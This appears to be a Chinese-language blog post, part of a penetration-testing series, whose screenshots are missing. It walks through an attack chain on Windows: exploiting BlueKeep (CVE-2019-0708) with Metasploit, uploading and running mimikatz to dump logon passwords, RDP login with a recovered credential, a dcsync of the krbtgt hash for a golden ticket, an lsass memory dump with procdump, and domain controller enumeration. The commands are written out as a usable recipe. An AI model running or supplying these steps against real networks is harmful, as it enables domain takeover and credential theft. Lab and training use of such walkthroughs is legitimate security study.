主页 > 网络知识 > 渗透贯穿始终中篇(6)

渗透贯穿始终中篇(6)

20201123100638699.png

metasploit之历史漏洞利用

发现有密码-查询历史漏洞进行攻击-MSF:windows/rdp/cve_2019_0708_bluekeep_rce

20201123134913103.png

20201123135051303.png

meterpreter> upload /mimikatz.rar

meterpreter> shell

C:\windows\system32>chcp 65001 【注:解决乱码问题】

C:\windows\system32>dir        【注:查找mimikatz.rar】

C:\windows\system32>unrar e mimikatz.rar

C:\windows\system32>mimikatz.exe

上传mimikatz

20201123135551217.png

破解win2008登录密码

  privilege::debug   sekurlsa::logonpasswords

2020112310323438.png

NTLM哈希

20201123103420893.png

远程登录

root@kali:~# rdesktop 192.168.28.130:1080

账户密码 Administrator:root@123456

20201123140826737.png

查询域内信息

20201123140041765.png

获得域控 伪造黄金票据

第一步:在域控内导出krbtgt用户的hash和sid(使用mimikatz.exe工具):

lsadump::dcsync /domain:test.com /user:krbtgt    domian:后面是域控名  user后面是krbtgt用户

20201123142411658.png

或者

可以利用procdump把lsass进程的内存文件导出本地,再在本地利用mimikatz读取密码

procdump64.exe -accepteula -ma lsass.exe lsass.dmp 导出为lsass.dump文件

2020112314394312.png

20201123144633427.png

获取域控信息

net group "domain controllers" /domain
说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!